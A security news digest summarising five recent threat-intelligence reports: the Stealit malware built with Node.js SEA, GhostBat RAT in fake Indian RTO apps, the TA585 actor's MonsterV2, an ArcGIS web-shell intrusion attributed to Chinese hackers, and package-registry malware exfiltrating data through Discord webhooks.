New Stealit Campaign Abuses Node.js Single Executable Application

FortiGuard Labs has identified a new and active Stealit malware campaign leveraging Node.js’ Single Executable Application (SEA) feature to distribute payloads. The campaign began after a spike in detections of a Visual Basic script later confirmed to serve persistence purposes. Unlike earlier Stealit campaigns built with Electron, this version uses Node.js’ SEA to bundle scripts and assets into standalone binaries, enabling execution without a pre-installed Node.js runtime.

Source: Fortinet

—

GhostBat RAT: Inside the Resurgence of RTO-Themed Android Malware

Cyble Research and Intelligence Labs (CRIL) observed a surge in Android malware campaigns disguised as Indian RTO applications. Distributed via WhatsApp messages, SMS, and compromised websites, these fake apps capture banking credentials, UPI PINs, and exfiltrate SMS messages with financial keywords. Some variants even include cryptocurrency mining features. Infected devices are registered through a Telegram bot named GhostBatRat_bot, linking the campaign to the GhostBat RAT malware.

Source: Cyble

—

When the Monster Bytes: Tracking TA585 and Its Arsenal

Proofpoint researchers have uncovered a new cybercriminal actor, TA585, operating with high sophistication and distributing malware like MonsterV2, a remote access trojan, stealer, and loader. MonsterV2 is sold on hacking forums and used by a small number of actors. TA585 stands out for managing its own infrastructure, delivery, and malware deployment without relying on third-party services or brokers.

Source: Proofpoint

—

Chinese Hackers Abuse Geo-Mapping Tool for Year-Long Persistence

Chinese state-sponsored hackers remained undetected for over a year by exploiting a component in Esri’s ArcGIS geo-mapping tool, converting it into a web shell. ArcGIS, widely used by municipalities and infrastructure operators, supports server object extensions that extend its functionality. ReliaQuest researchers attribute the attack to a Chinese APT group, likely Flax Typhoon, based on operational similarities.

Source: BleepingComputer

—

npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels

Researchers have discovered malicious packages across npm, Python, and Ruby ecosystems using Discord as a command-and-control channel. Attackers exploit Discord webhooks to transmit stolen data to actor-controlled channels, as webhooks can post messages without authentication and are write-only, preventing defenders from reviewing prior posts. This approach shifts the economics of supply chain attacks by leveraging widely accessible cloud-based tools.

Source: TheHackerNews